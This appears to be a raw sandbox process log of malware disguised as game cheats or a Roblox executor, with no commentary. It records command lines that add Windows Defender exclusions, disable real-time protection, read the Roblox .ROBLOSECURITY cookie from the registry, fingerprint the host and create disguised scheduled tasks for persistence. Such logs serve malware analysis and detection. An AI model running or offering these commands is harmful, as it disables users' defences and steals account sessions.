"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sdnkx1b4\sdnkx1b4.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB49A.tmp" "c:\Users\Admin\AppData\Roaming\CSCBD048FD6E5AA491F8B105C9E1CC74B86.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qh3itvjb\qh3itvjb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5D3.tmp" "c:\Windows\System32\CSCE5B170DA89404678AA3867794C8F9A19.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\hostNet\sppsvc.exe'" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\hostNet\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\hostNet\sppsvc.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RustCheatR" /sc MINUTE /mo 11 /tr "'C:\hostNet\RustCheat.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RustCheat" /sc ONLOGON /tr "'C:\hostNet\RustCheat.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RustCheatR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RustCheat.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Public\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\Branding\Basebrd\it-IT\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Branding\Basebrd\it-IT\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\Branding\Basebrd\it-IT\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AkPTDK6pOe.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

